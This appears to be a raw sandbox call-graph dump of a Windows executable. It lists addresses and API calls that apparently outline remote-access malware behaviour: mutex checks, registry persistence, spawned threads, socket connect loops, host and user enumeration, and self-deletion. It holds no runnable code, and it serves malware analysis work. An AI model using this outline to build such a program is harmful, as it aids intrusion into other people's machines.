UnhandledExceptionFilter ___scrt_get_show_window_mode 47249->47571 47260 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47251->47260 47572 4442d2 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47251->47572 47253 43496d 47255 434973 ___scrt_is_nonwritable_in_current_image 47253->47255 47573 444276 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47253->47573 47256 4349f3 47284 434ba5 47256->47284 47260->47256 47574 443487 36 API calls 4 library calls 47260->47574 47266 434a15 47268 434a1f 47266->47268 47576 4434bf 28 API calls _abort 47266->47576 47269 434a28 47268->47269 47577 443462 28 API calls _abort 47268->47577 47578 43479e 13 API calls 2 library calls 47269->47578 47272 434a30 47272->47255 47274 434630 47273->47274 47579 434cb6 IsProcessorFeaturePresent 47274->47579 47276 43463c 47580 438fb1 10 API calls 4 library calls 47276->47580 47278 434641 47283 434645 47278->47283 47581 44415f 47278->47581 47281 43465c 47281->47249 47283->47249 47640 436f10 47284->47640 47287 4349f9 47288 444223 47287->47288 47642 44f0d9 47288->47642 47290 434a02 47293 40ea00 47290->47293 47291 44422c 47291->47290 47646 446895 36 API calls 47291->47646 47648 41cbe1 LoadLibraryA GetProcAddress 47293->47648 47295 40ea1c GetModuleFileNameW 47653 40f3fe 47295->47653 47297 40ea38 47668 4020f6 47297->47668 47300 4020f6 28 API calls 47301 40ea56 47300->47301 47674 41beac 47301->47674 47305 40ea68 47700 401e8d 47305->47700 47307 40ea71 47308 40ea84 47307->47308 47309 40eace 47307->47309 47967 40fbee 118 API calls 47308->47967 47706 401e65 47309->47706 47312 40eade 47316 401e65 22 API calls 47312->47316 47313 40ea96 47314 401e65 22 API calls 47313->47314 47315 40eaa2 47314->47315 47968 410f72 36 API calls __EH_prolog 47315->47968 47317 40eafd 47316->47317 47711 40531e 47317->47711 47320 40eb0c 47716 406383 47320->47716 47321 40eab4 47969 40fb9f 78 API calls 47321->47969 47325 40eabd 47970 40f3eb 71 API calls 47325->47970 47331 401fd8 11 API calls 47333 40ef36 47331->47333 47332 401fd8 11 API calls 47334 40eb36 47332->47334 47575 443396 GetModuleHandleW 47333->47575 47335 401e65 22 API calls 47334->47335 47336 40eb3f 47335->47336 47733 401fc0 47336->47733 47338 40eb4a 47339 401e65 22 API calls 47338->47339 47340 40eb63 47339->47340 47341 401e65 22 API calls 47340->47341 47342 40eb7e 47341->47342 47343 40ebe9 47342->47343 47971 406c59 47342->47971 47344 401e65 22 API calls 47343->47344 47349 40ebf6 47344->47349 47346 40ebab 47347 401fe2 28 API calls 47346->47347 47348 40ebb7 47347->47348 47351 401fd8 11 API calls 47348->47351 47350 40ec3d 47349->47350 47356 413584 3 API calls 47349->47356 47737 40d0a4 47350->47737 47353 40ebc0 47351->47353 47976 413584 RegOpenKeyExA 47353->47976 47354 40ec43 47355 40eac6 47354->47355 47740 41b354 47354->47740 47355->47331 47362 40ec21 47356->47362 47360 40f38a 48057 4139e4 30 API calls 47360->48057 47361 40ec5e 47363 40ecb1 47361->47363 47757 407751 47361->47757 47362->47350 47979 4139e4 30 API calls 47362->47979 47365 401e65 22 API calls 47363->47365 47368 40ecba 47365->47368 47377 40ecc6 47368->47377 47378 40eccb 47368->47378 47370 40f3a0 48058 4124b0 65 API calls ___scrt_get_show_window_mode 47370->48058 47371 40ec87 47375 401e65 22 API calls 47371->47375 47372 40ec7d 47980 407773 30 API calls 47372->47980 47387 40ec90 47375->47387 47376 40f3aa 47380 41bcef 28 API calls 47376->47380 47983 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47377->47983 47383 401e65 22 API calls 47378->47383 47379 40ec82 47981 40729b 98 API calls 47379->47981 47384 40f3ba 47380->47384 47385 40ecd4 47383->47385 47866 413a5e RegOpenKeyExW 47384->47866 47761 41bcef 47385->47761 47387->47363 47391 40ecac 47387->47391 47388 40ecdf 47765 401f13 47388->47765 47982 40729b 98 API calls 47391->47982 47395 401f09 11 API calls 47396 40f3d7 47395->47396 47398 401f09 11 API calls 47396->47398 47400 40f3e0 47398->47400 47869 40dd7d 47400->47869 47401 401e65 22 API calls 47402 40ecfc 47401->47402 47406 401e65 22 API calls 47402->47406 47408 40ed16 47406->47408 47407 40f3ea 47409 401e65 22 API calls 47408->47409 47410 40ed30 47409->47410 47411 401e65 22 API calls 47410->47411 47412 40ed49 47411->47412 47413 40edb6 47412->47413 47414 401e65 22 API calls 47412->47414 47415 40edc5 47413->47415 47420 40ef41 ___scrt_get_show_window_mode 47413->47420 47419 40ed5e _wcslen 47414->47419 47416 40edce 47415->47416 47444 40ee4a ___scrt_get_show_window_mode 47415->47444 47417 401e65 22 API calls 47416->47417 47418 40edd7 47417->47418 47421 401e65 22 API calls 47418->47421 47419->47413 47422 401e65 22 API calls 47419->47422 48044 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47420->48044 47423 40ede9 47421->47423 47424 40ed79 47422->47424 47426 401e65 22 API calls 47423->47426 47428 401e65 22 API calls 47424->47428 47427 40edfb 47426->47427 47431 401e65 22 API calls 47427->47431 47429 40ed8e 47428->47429 47984 40da6f 47429->47984 47430 40ef8c 47432 401e65 22 API calls 47430->47432 47433 40ee24 47431->47433 47434 40efb1 47432->47434 47439 401e65 22 API calls 47433->47439 47787 402093 47434->47787 47437 401f13 28 API calls 47438 40edad 47437->47438 47441 401f09 11 API calls 47438->47441 47442 40ee35 47439->47442 47441->47413 48042 40ce34 45 API calls _wcslen 47442->48042 47443 40efc3 47793 4137aa RegCreateKeyA 47443->47793 47777 413982 47444->47777 47449 40eede ctype 47453 401e65 22 API calls 47449->47453 47450 40ee45 47450->47444 47451 401e65 22 API calls 47452 40efe5 47451->47452 47799 43bb2c 47452->47799 47454 40eef5 47453->47454 47454->47430 47458 40ef09 47454->47458 47457 40effc 48045 41ce2c 87 API calls ___scrt_get_show_window_mode 47457->48045 47460 401e65 22 API calls 47458->47460 47459 40f01f 47463 402093 28 API calls 47459->47463 47461 40ef12 47460->47461 47464 41bcef 28 API calls 47461->47464 47466 40f034 47463->47466 47467 40ef1e 47464->47467 47465 40f003 CreateThread 47465->47459 48804 41d4ee 10 API calls 47465->48804 47468 402093 28 API calls 47466->47468 48043 40f4af 104 API calls 47467->48043 47470 40f043 47468->47470 47803 41b580 47470->47803 47471 40ef23 47471->47430 47473 40ef2a 47471->47473 47473->47355 47475 401e65 22 API calls 47476 40f054 47475->47476 47477 401e65 22 API calls 47476->47477 47478 40f066 47477->47478 47479 401e65 22 API calls 47478->47479 47480 40f086 47479->47480 47481 43bb2c 40 API calls 47480->47481 47482 40f093 47481->47482 47483 401e65 22 API calls 47482->47483 47484 40f09e 47483->47484 47485 401e65 22 API calls 47484->47485 47486 40f0af 47485->47486 47487 401e65 22 API calls 47486->47487 47488 40f0c4 47487->47488 47489 401e65 22 API calls 47488->47489 47490 40f0d5 47489->47490 47491 40f0dc StrToIntA 47490->47491 47827 409e1f 47491->47827 47494 401e65 22 API calls 47495 40f0f7 47494->47495 47496 40f103 47495->47496 47497 40f13c 47495->47497 48046 43455e 47496->48046 47499 401e65 22 API calls 47497->47499 47501 40f14c 47499->47501 47505 40f194 47501->47505 47506 40f158 47501->47506 47502 401e65 22 API calls 47503 40f11f 47502->47503 47504 40f126 CreateThread 47503->47504 47504->47497 48801 41a045 103 API calls __EH_prolog 47504->48801 47508 401e65 22 API calls 47505->47508 47507 43455e new 22 API calls 47506->47507 47510 40f161 47507->47510 47509 40f19d 47508->47509 47513 40f207 47509->47513 47514 40f1a9 47509->47514 47511 401e65 22 API calls 47510->47511 47512 40f173 47511->47512 47517 40f17a CreateThread 47512->47517 47515 401e65 22 API calls 47513->47515 47516 401e65 22 API calls 47514->47516 47518 40f210 47515->47518 47519 40f1b9 47516->47519 47517->47505 48806 41a045 103 API calls __EH_prolog 47517->48806 47520 40f255 47518->47520 47521 40f21c 47518->47521 47522 401e65 22 API calls 47519->47522 47852 41b69e GetComputerNameExW GetUserNameW 47520->47852 47524 401e65 22 API calls 47521->47524 47525 40f1ce 47522->47525 47527 40f225 47524->47527 48053 40da23 31 API calls 47525->48053 47532 401e65 22 API calls 47527->47532 47528 401f13 28 API calls 47529 40f269 47528->47529 47531 401f09 11 API calls 47529->47531 47534 40f272 47531->47534 47542 40f23a 47532->47542 47533 40f1e1 47535 401f13 28 API calls 47533->47535 47536 40f27b SetProcessDEPPolicy 47534->47536 47537 40f27e CreateThread 47534->47537 47538 40f1ed 47535->47538 47536->47537 47540 40f293 CreateThread 47537->47540 47541 40f29f 47537->47541 48774 40f7e2 47537->48774 47539 401f09 11 API calls 47538->47539 47544 40f1f6 CreateThread 47539->47544 47540->47541 48802 412132 138 API calls 47540->48802 47545 40f2b4 47541->47545 47546 40f2a8 CreateThread 47541->47546 47543 43bb2c 40 API calls 47542->47543 47547 40f247 47543->47547 47544->47513 48803 401be9 50 API calls 47544->48803 47548 40f307 47545->47548 47550 402093 28 API calls 47545->47550 47546->47545 48805 412716 38 API calls ___scrt_get_show_window_mode 47546->48805 48054 40c19d 7 API calls 47547->48054 47863 41353a RegOpenKeyExA 47548->47863 47551 40f2d7 47550->47551 48055 4052fd 28 API calls 47551->48055 47556 40f328 47558 41bcef 28 API calls 47556->47558 47560 40f338 47558->47560 48056 413656 31 API calls 47560->48056 47565 40f34e 47566 401f09 11 API calls 47565->47566 47569 40f359 47566->47569 47567 40f381 DeleteFileW 47568 40f388 47567->47568 47567->47569 47568->47376 47569->47376 47569->47567 47570 40f36f Sleep 47569->47570 47570->47569 47571->47249 47572->47253 47573->47260 47574->47256 47575->47266 47576->47268 47577->47269 47578->47272 47579->47276 47580->47278 47585 44fbe8 47581->47585 47584 438fda 8 API calls 3 library calls 47584->47283 47586 44fc05 47585->47586 47587 44fc01 47585->47587 47586->47587 47591 449d26 47586->47591 47603 43502b 5 API calls ___raise_securityfailure 47587->47603 47589 43464e 47589->47281 47589->47584 47592 449d32 ___scrt_is_nonwritable_in_current_image 47591->47592 47604 445909 EnterCriticalSection 47592->47604 47594 449d39 47605 450203 47594->47605 47596 449d48 47597 449d57 47596->47597 47616 449bba 23 API calls 47596->47616 47618 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47597->47618 47600 449d52 47617 449c70 GetStdHandle GetFileType 47600->47617 47601 449d68 ___scrt_is_nonwritable_in_current_image 47601->47586 47603->47589 47604->47594 47606 45020f ___scrt_is_nonwritable_in_current_image 47605->47606 47607 450233 47606->47607 47608 45021c 47606->47608 47619 445909 EnterCriticalSection 47607->47619 47627 44062d 20 API calls _free 47608->47627 47611 450221 pre_c_initialization ___scrt_is_nonwritable_in_current_image 47611->47596 47612 45023f 47615 45026b 47612->47615 47620 450154 47612->47620 47628 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47615->47628 47616->47600 47617->47597 47618->47601 47619->47612 47629 445b74 47620->47629 47622 450173 47637 446802 20 API calls _free 47622->47637 47623 450166 47623->47622 47636 448b04 11 API calls 2 library calls 47623->47636 47625 4501c5 47625->47612 47627->47611 47628->47611 47634 445b81 __Getctype 47629->47634 47630 445bc1 47639 44062d 20 API calls _free 47630->47639 47631 445bac RtlAllocateHeap 47632 445bbf 47631->47632 47631->47634 47632->47623 47634->47630 47634->47631 47638 443001 7 API calls 2 library calls 47634->47638 47636->47623 47637->47625 47638->47634 47639->47632 47641 434bb8 GetStartupInfoW 47640->47641 47641->47287 47643 44f0eb 47642->47643 47644 44f0e2 47642->47644 47643->47291 47647 44efd8 49 API calls 4 library calls 47644->47647 47646->47291 47647->47643 47649 41cc20 LoadLibraryA GetProcAddress 47648->47649 47650 41cc10 GetModuleHandleA GetProcAddress 47648->47650 47651 41cc49 44 API calls 47649->47651 47652 41cc39 LoadLibraryA GetProcAddress 47649->47652 47650->47649 47651->47295 47652->47651 48059 41b539 FindResourceA 47653->48059 47657 40f428 ctype 48069 4020b7 47657->48069 47660 401fe2 28 API calls 47661 40f44e 47660->47661 47662 401fd8 11 API calls 47661->47662 47663 40f457 47662->47663 47664 43bda0 _Yarn 21 API calls 47663->47664 47665 40f468 ctype 47664->47665 48075 406e13 47665->48075 47667 40f49b 47667->47297 47669 40210c 47668->47669 47670 4023ce 11 API calls 47669->47670 47671 402126 47670->47671 47672 402569 28 API calls 47671->47672 47673 402134 47672->47673 47673->47300 48129 4020df 47674->48129 47676 41bebf 47680 41bf31 47676->47680 47688 401fe2 28 API calls 47676->47688 47691 401fd8 11 API calls 47676->47691 47695 41bf2f 47676->47695 48133 4041a2 28 API calls 47676->48133 48134 41cec5 47676->48134 47677 401fd8 11 API calls 47678 41bf61 47677->47678 47679 401fd8 11 API calls 47678->47679 47681 41bf69 47679->47681 48145 4041a2 28 API calls 47680->48145 47684 401fd8 11 API calls 47681->47684 47686 40ea5f 47684->47686 47685 41bf3d 47687 401fe2 28 API calls 47685->47687 47696 40fb52 47686->47696 47689 41bf46 47687->47689 47688->47676 47690 401fd8 11 API calls 47689->47690 47692 41bf4e 47690->47692 47691->47676 47694 41cec5 28 API calls 47692->47694 47694->47695 47695->47677 47697 40fb5e 47696->47697 47699 40fb65 47696->47699 48160 402163 11 API calls 47697->48160 47699->47305 47701 402163 47700->47701 47705 40219f 47701->47705 48161 402730 11 API calls 47701->48161 47703 402184 48162 402712 11 API calls std::_Deallocate 47703->48162 47705->47307 47707 401e6d 47706->47707 47709 401e75 47707->47709 48163 402158 22 API calls 47707->48163 47709->47312 47712 4020df 11 API calls 47711->47712 47713 40532a 47712->47713 48164 4032a0 47713->48164 47715 405346 47715->47320 48168 4051ef 47716->48168 47718 406391 48172 402055 47718->48172 47721 401fe2 47722 401ff1 47721->47722 47729 402039 47721->47729 47723 4023ce 11 API calls 47722->47723 47724 401ffa 47723->47724 47725 402015 47724->47725 47726 40203c 47724->47726 48204 403098 28 API calls 47725->48204 47727 40267a 11 API calls 47726->47727 47727->47729 47730 401fd8 47729->47730 47731 4023ce 11 API calls 47730->47731 47732 401fe1 47731->47732 47732->47332 47734 401fd2 47733->47734 47735 401fc9 47733->47735 47734->47338 48205 4025e0 28 API calls 47735->48205 48206 401fab 47737->48206 47739 40d0ae CreateMutexA GetLastError 47739->47354 48207 41c048 47740->48207 47745 401fe2 28 API calls 47746 41b390 47745->47746 47747 401fd8 11 API calls 47746->47747 47748 41b398 47747->47748 47749 4135e1 31 API calls 47748->47749 47750 41b3ee 47748->47750 47751 41b3c1 47749->47751 47750->47361 47752 41b3cc StrToIntA 47751->47752 47753 41b3e3 47752->47753 47754 41b3da 47752->47754 47756 401fd8 11 API calls 47753->47756 48215 41cffa 22 API calls 47754->48215 47756->47750 47758 407765 47757->47758 47759 413584 3 API calls 47758->47759 47760 40776c 47759->47760 47760->47371 47760->47372 47762 41bd03 47761->47762 48216 40b93f 47762->48216 47764 41bd0b 47764->47388 47766 401f22 47765->47766 47773 401f6a 47765->47773 47767 402252 11 API calls 47766->47767 47768 401f2b 47767->47768 47769 401f6d 47768->47769 47771 401f46 47768->47771 48249 402336 47769->48249 48248 40305c 28 API calls 47771->48248 47774 401f09 47773->47774 47775 402252 11 API calls 47774->47775 47776 401f12 47775->47776 47776->47401 47778 4139a0 47777->47778 47779 406e13 28 API calls 47778->47779 47780 4139b5 47779->47780 47781 4020f6 28 API calls 47780->47781 47782 4139c5 47781->47782 47783 4137aa 14 API calls 47782->47783 47784 4139cf 47783->47784 47785 401fd8 11 API calls 47784->47785 47786 4139dc 47785->47786 47786->47449 47788 40209b 47787->47788 47789 4023ce 11 API calls 47788->47789 47790 4020a6 47789->47790 48253 4024ed 47790->48253 47794 4137fa 47793->47794 47796 4137c3 47793->47796 47795 401fd8 11 API calls 47794->47795 47797 40efd9 47795->47797 47798 4137d5 RegSetValueExA RegCloseKey 47796->47798 47797->47451 47798->47794 47800 43bb45 _swprintf 47799->47800 48257 43ae83 47800->48257 47802 40eff2 47802->47457 47802->47459 47804 41b631 47803->47804 47805 41b596 GetLocalTime 47803->47805 47807 401fd8 11 API calls 47804->47807 47806 40531e 28 API calls 47805->47806 47808 41b5d8 47806->47808 47809 41b639 47807->47809 47810 406383 28 API calls 47808->47810 47811 401fd8 11 API calls 47809->47811 47812 41b5e4 47810->47812 47813 40f048 47811->47813 48285 402f10 47812->48285 47813->47475 47816 406383 28 API calls 47817 41b5fc 47816->47817 48290 40723b 77 API calls 47817->48290 47819 41b60a 47820 401fd8 11 API calls 47819->47820 47821 41b616 47820->47821 47822 401fd8 11 API calls 47821->47822 47823 41b61f 47822->47823 47824 401fd8 11 API calls 47823->47824 47825 41b628 47824->47825 47826 401fd8 11 API calls 47825->47826 47826->47804 47828 409e3d _wcslen 47827->47828 47829 409e48 47828->47829 47830 409e5f 47828->47830 47831 40da6f 31 API calls 47829->47831 47832 40da6f 31 API calls 47830->47832 47833 409e50 47831->47833 47834 409e67 47832->47834 47835 401f13 28 API calls 47833->47835 47836 401f13 28 API calls 47834->47836 47837 409e5a 47835->47837 47838 409e75 47836->47838 47840 401f09 11 API calls 47837->47840 47839 401f09 11 API calls 47838->47839 47841 409e7d 47839->47841 47842 409eb4 47840->47842 48309 409196 28 API calls 47841->48309 48294 40a144 47842->48294 47844 409e8f 48310 403014 47844->48310 47849 401f13 28 API calls 47850 409ea4 47849->47850 47851 401f09 11 API calls 47850->47851 47851->47837 48506 40417e 47852->48506 47857 403014 28 API calls 47858 41b703 47857->47858 47859 401f09 11 API calls 47858->47859 47860 41b70c 47859->47860 47861 401f09 11 API calls 47860->47861 47862 40f25e 47861->47862 47862->47528 47864 41355b RegQueryValueExA RegCloseKey 47863->47864 47865 40f31f 47863->47865 47864->47865 47865->47400 47865->47556 47867 413a7a RegDeleteValueW 47866->47867 47868 40f3cd 47866->47868 47867->47868 47868->47395 47870 40dd96 47869->47870 47871 41353a 3 API calls 47870->47871 47872 40dd9d 47871->47872 47873 40ddbc 47872->47873 48600 401707 47872->48600 47877 414f65 47873->47877 47875 40ddaa 48603 4138b2 RegCreateKeyA 47875->48603 47878 4020df 11 API calls 47877->47878 47879 414f79 47878->47879 48617 41b944 47879->48617 47882 4020df 11 API calls 47883 414f8f 47882->47883 47884 401e65 22 API calls 47883->47884 47885 414f9d 47884->47885 47886 43bb2c 40 API calls 47885->47886 47887 414faa 47886->47887 47888 414fbc 47887->47888 47889 414faf Sleep 47887->47889 47890 402093 28 API calls 47888->47890 47889->47888 47891 414fcb 47890->47891 47892 401e65 22 API calls 47891->47892 47893 414fd4 47892->47893 47894 4020f6 28 API calls 47893->47894 47895 414fdf 47894->47895 47896 41beac 28 API calls 47895->47896 47897 414fe7 47896->47897 48621 40489e WSAStartup 47897->48621 47899 414ff1 47900 401e65 22 API calls 47899->47900 47901 414ffa 47900->47901 47902 401e65 22 API calls 47901->47902 47927 415079 47901->47927 47903 415013 47902->47903 47904 401e65 22 API calls 47903->47904 47905 415024 47904->47905 47908 401e65 22 API calls 47905->47908 47906 41beac 28 API calls 47906->47927 47907 401e65 22 API calls 47907->47927 47909 415035 47908->47909 47911 401e65 22 API calls 47909->47911 47910 406c59 28 API calls 47910->47927 47912 415046 47911->47912 47914 401e65 22 API calls 47912->47914 47913 401fe2 28 API calls 47913->47927 47915 415057 47914->47915 47916 401e65 22 API calls 47915->47916 47917 415069 47916->47917 48724 40473d 89 API calls 47917->48724 47919 402093 28 API calls 47919->47927 47920 41b580 80 API calls 47920->47927 47922 4151c7 WSAGetLastError 48725 41cb72 30 API calls 47922->48725 47927->47906 47927->47907 47927->47910 47927->47913 47927->47919 47927->47920 47927->47922 47930 40531e 28 API calls 47927->47930 47931 401e8d 11 API calls 47927->47931 47932 402f10 28 API calls 47927->47932 47933 43bb2c 40 API calls 47927->47933 47934 406383 28 API calls 47927->47934 47936 401fd8 11 API calls 47927->47936 47938 409097 28 API calls 47927->47938 47940 4020f6 28 API calls 47927->47940 47942 4135e1 31 API calls 47927->47942 47955 4153f6 47927->47955 48622 414f24 47927->48622 48628 40482d 47927->48628 48635 404f51 47927->48635 48650 4048c8 connect 47927->48650 48710 404e26 WaitForSingleObject 47927->48710 48726 4052fd 28 API calls 47927->48726 48727 4145f8 51 API calls 47927->48727 48728 441ed1 20 API calls 47927->48728 48729 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47927->48729 47930->47927 47931->47927 47932->47927 47935 415b0a Sleep 47933->47935 47934->47927 47935->47927 47936->47927 47938->47927 47940->47927 47942->47927 47943 40417e 28 API calls 47943->47955 47946 401e65 22 API calls 47947 415474 GetTickCount 47946->47947 48732 41bc1f 28 API calls 47947->48732 47950 41bc1f 28 API calls 47950->47955 47952 41bdaf 28 API calls 47952->47955 47955->47927 47955->47943 47955->47946 47955->47950 47955->47952 47956 402f10 28 API calls 47955->47956 47957 406383 28 API calls 47955->47957 47958 402ea1 28 API calls 47955->47958 47960 401fd8 11 API calls 47955->47960 47961 401f09 11 API calls 47955->47961 47964 402093 28 API calls 47955->47964 47965 41b580 80 API calls 47955->47965 47966 415aac CreateThread 47955->47966 48730 40ddc4 6 API calls 47955->48730 48731 41bcd3 28 API calls 47955->48731 48733 41bb77 GetTickCount 47955->48733 48734 41bb27 30 API calls ___scrt_get_show_window_mode 47955->48734 48735 40f90c 29 API calls 47955->48735 48736 402f31 28 API calls 47955->48736 48737 404aa1 61 API calls ctype 47955->48737 48738 404c10 113 API calls _Yarn 47955->48738 48739 40b08c 85 API calls 47955->48739 47956->47955 47957->47955 47958->47955 47960->47955 47961->47955 47964->47955 47965->47955 47966->47955 48764 41ada8 104 API calls 47966->48764 47967->47313 47968->47321 47969->47325 47972 4020df 11 API calls 47971->47972 47973 406c65 47972->47973 47974 4032a0 28 API calls 47973->47974 47975 406c82 47974->47975 47975->47346 47977 40ebdf 47976->47977 47978 4135ae RegQueryValueExA RegCloseKey 47976->47978 47977->47343 47977->47360 47978->47977 47979->47350 47980->47379 47981->47371 47982->47363 47983->47378 47985 401f86 11 API calls 47984->47985 47986 40da8b 47985->47986 47987 40dae0 47986->47987 47988 40daab 47986->47988 47991 40daa1 47986->47991 47990 41c048 GetCurrentProcess 47987->47990 48765 41b645 29 API calls 47988->48765 47989 40dbd4 GetLongPathNameW 47993 40417e 28 API calls 47989->47993 47994 40dae5 47990->47994 47991->47989 47997 40dbe9 47993->47997 47998 40dae9 47994->47998 47999 40db3b 47994->47999 47995 40dab4 47996 401f13 28 API calls 47995->47996 48037 40dabe 47996->48037 48000 40417e 28 API calls 47997->48000 48002 40417e 28 API calls 47998->48002 48001 40417e 28 API calls 47999->48001 48003 40dbf8 48000->48003 48004 40db49 48001->48004 48005 40daf7 48002->48005 48768 40de0c 28 API calls 48003->48768 48010 40417e 28 API calls 48004->48010 48011 40417e 28 API calls 48005->48011 48006 401f09 11 API calls 48006->47991 48008 40dc0b 48769 402fa5 28 API calls 48008->48769 48014 40db5f 48010->48014 48012 40db0d 48011->48012 48766 402fa5 28 API calls 48012->48766 48013 40dc16 48770 402fa5 28 API calls 48013->48770 48767 402fa5 28 API calls 48014->48767 48018 40db6a 48022 401f13 28 API calls 48018->48022 48019 40db18 48023 401f13 28 API calls 48019->48023 48020 40dc20 48021 401f09 11 API calls 48020->48021 48024 40dc2a 48021->48024 48025 40db75 48022->48025 48026 40db23 48023->48026 48027 401f09 11 API calls 48024->48027 48028 401f09 11 API calls 48025->48028 48029 401f09 11 API calls 48026->48029 48030 40dc33 48027->48030 48031 40db7e 48028->48031 48032 40db2c 48029->48032 48033 401f09 11 API calls 48030->48033 48034 401f09 11 API calls 48031->48034 48035 401f09 11 API calls 48032->48035 48036 40dc3c 48033->48036 48034->48037 48035->48037 48038 401f09 11 API calls 48036->48038 48037->48006 48039 40dc45 48038->48039 48040 401f09 11 API calls 48039->48040 48041 40dc4e 48040->48041 48041->47437 48042->47450 48043->47471 48044->47430 48045->47465 48048 434563 48046->48048 48047 43bda0 _Yarn 21 API calls 48047->48048 48048->48047 48049 40f10c 48048->48049 48771 443001 7 API calls 2 library calls 48048->48771 48772 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48048->48772 48773 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48048->48773 48049->47502 48053->47533 48054->47520 48056->47565 48057->47370 48060 41b556 LoadResource LockResource SizeofResource 48059->48060 48061 40f419 48059->48061 48060->48061 48062 43bda0 48061->48062 48067 4461b8 __Getctype 48062->48067 48063 4461f6 48079 44062d 20 API calls _free 48063->48079 48065 4461e1 RtlAllocateHeap 48066 4461f4 48065->48066 48065->48067 48066->47657 48067->48063 48067->48065 48078 443001 7 API calls 2 library calls 48067->48078 48070 4020bf 48069->48070 48080 4023ce 48070->48080 48072 4020ca 48084 40250a 48072->48084 48074 4020d9 48074->47660 48076 4020b7 28 API calls 48075->48076 48077 406e27 48076->48077 48077->47667 48078->48067 48079->48066 48081 402428 48080->48081 48082 4023d8 48080->48082 48081->48072 48082->48081 48091 4027a7 11 API calls std::_Deallocate 48082->48091 48085 40251a 48084->48085 48086 402520 48085->48086 48087 402535 48085->48087 48092 402569 48086->48092 48102 4028e8 48087->48102 48090 402533 48090->48074 48091->48081 48113 402888 48092->48113 48094 40257d 48095 402592 48094->48095 48096 4025a7 48094->48096 48118 402a34 22 API calls 48095->48118 48097 4028e8 28 API calls 48096->48097 48101 4025a5 48097->48101 48099 40259b 48119 4029da 22 API calls 48099->48119 48101->48090 48103 4028f1 48102->48103 48104 402953 48103->48104 48105 4028fb 48103->48105 48127 4028a4 22 API calls 48104->48127 48108 402904 48105->48108 48110 402917 48105->48110 48121 402cae 48108->48121 48111 402915 48110->48111 48112 4023ce 11 API calls 48110->48112 48111->48090 48112->48111 48114 402890 48113->48114 48115 402898 48114->48115 48120 402ca3 22 API calls 48114->48120 48115->48094 48118->48099 48119->48101 48122 402cb8 __EH_prolog 48121->48122 48128 402e54 22 API calls 48122->48128 48124 4023ce 11 API calls 48126 402d92 48124->48126 48125 402d24 48125->48124 48126->48111 48128->48125 48130 4020e7 48129->48130 48131 4023ce 11 API calls 48130->48131 48132 4020f2 48131->48132 48132->47676 48133->47676 48135 41ced2 48134->48135 48136 41cf31 48135->48136 48140 41cee2 48135->48140 48137 41cf4b 48136->48137 48151 41d071 28 API calls 48136->48151 48139 41d1d7 28 API calls 48137->48139 48142 41cf2d 48139->48142 48141 41cf1a 48140->48141 48146 41d071 28 API calls 48140->48146 48147 41d1d7 48141->48147 48142->47676 48145->47685 48146->48141 48148 41d1e0 48147->48148 48152 41d283 48148->48152 48151->48137 48153 41d28c 48152->48153 48156 41d331 48153->48156 48158 41d33c 48156->48158 48157 41d1ea 48157->48142 48158->48157 48159 4020f6 28 API calls 48158->48159 48159->48157 48160->47699 48161->47703 48162->47705 48166 4032aa 48164->48166 48165 4032c9 48165->47715 48166->48165 48167 4028e8 28 API calls 48166->48167 48167->48165 48169 4051fb 48168->48169 48178 405274 48169->48178 48171 405208 48171->47718 48173 402061 48172->48173 48174 4023ce 11 API calls 48173->48174 48175 40207b 48174->48175 48200 40267a 48175->48200 48179 405282 48178->48179 48180 405288 48179->48180 48181 40529e 48179->48181 48189 4025f0 48180->48189 48183 4052f5 48181->48183 48184 4052b6 48181->48184 48198 4028a4 22 API calls 48183->48198 48187 4028e8 28 API calls 48184->48187 48188 40529c 48184->48188 48187->48188 48188->48171 48190 402888 22 API calls 48189->48190 48191 402602 48190->48191 48192 402672 48191->48192 48193 402629 48191->48193 48199 4028a4 22 API calls 48192->48199 48196 4028e8 28 API calls 48193->48196 48197 40263b 48193->48197 48196->48197 48197->48188 48201 40268b 48200->48201 48202 4023ce 11 API calls 48201->48202 48203 40208d 48202->48203 48203->47721 48204->47729 48205->47734 48208 41b362 48207->48208 48209 41c055 GetCurrentProcess 48207->48209 48210 4135e1 RegOpenKeyExA 48208->48210 48209->48208 48211 41360f RegQueryValueExA RegCloseKey 48210->48211 48212 413639 48210->48212 48211->48212 48213 402093 28 API calls 48212->48213 48214 41364e 48213->48214 48214->47745 48215->47753 48217 40b947 48216->48217 48222 402252 48217->48222 48219 40b952 48226 40b967 48219->48226 48221 40b961 48221->47764 48223 4022ac 48222->48223 48224 40225c 48222->48224 48223->48219 48224->48223 48233 402779 11 API calls std::_Deallocate 48224->48233 48227 40b9a1 48226->48227 48228 40b973 48226->48228 48245 4028a4 22 API calls 48227->48245 48234 4027e6 48228->48234 48232 40b97d 48232->48221 48233->48223 48235 4027ef 48234->48235 48236 402851 48235->48236 48237 4027f9 48235->48237 48247 4028a4 22 API calls 48236->48247 48240 402802 48237->48240 48243 402815 48237->48243 48246 402aea 28 API calls __EH_prolog 48240->48246 48241 402813 48241->48232 48243->48241 48244 402252 11 API calls 48243->48244 48244->48241 48246->48241 48248->47773 48250 402347 48249->48250 48251 402252 11 API calls 48250->48251 48252 4023c7 48251->48252 48252->47773 48254 4024f9 48253->48254 48255 40250a 28 API calls 48254->48255 48256 4020b1 48255->48256 48256->47443 48273 43ba8a 48257->48273 48259 43aed0 48279 43a837 36 API calls 2 library calls 48259->48279 48260 43ae95 48260->48259 48261 43aeaa 48260->48261 48264 43aeaf pre_c_initialization 48260->48264 48278 44062d 20 API calls _free 48261->48278 48264->47802 48266 43aedc 48267 43af0b 48266->48267 48280 43bacf 40 API calls __Toupper 48266->48280 48268 43af77 48267->48268 48281 43ba36 20 API calls 2 library calls 48267->48281 48282 43ba36 20 API calls 2 library calls 48268->48282 48271 43b03e _swprintf 48271->48264 48283 44062d 20 API calls _free 48271->48283 48274 43baa2 48273->48274 48275 43ba8f 48273->48275 48274->48260 48284 44062d 20 API calls _free 48275->48284 48277 43ba94 pre_c_initialization 48277->48260 48278->48264 48279->48266 48280->48266 48281->48268 48282->48271 48283->48264 48284->48277 48291 401fb0 48285->48291 48287 402f1e 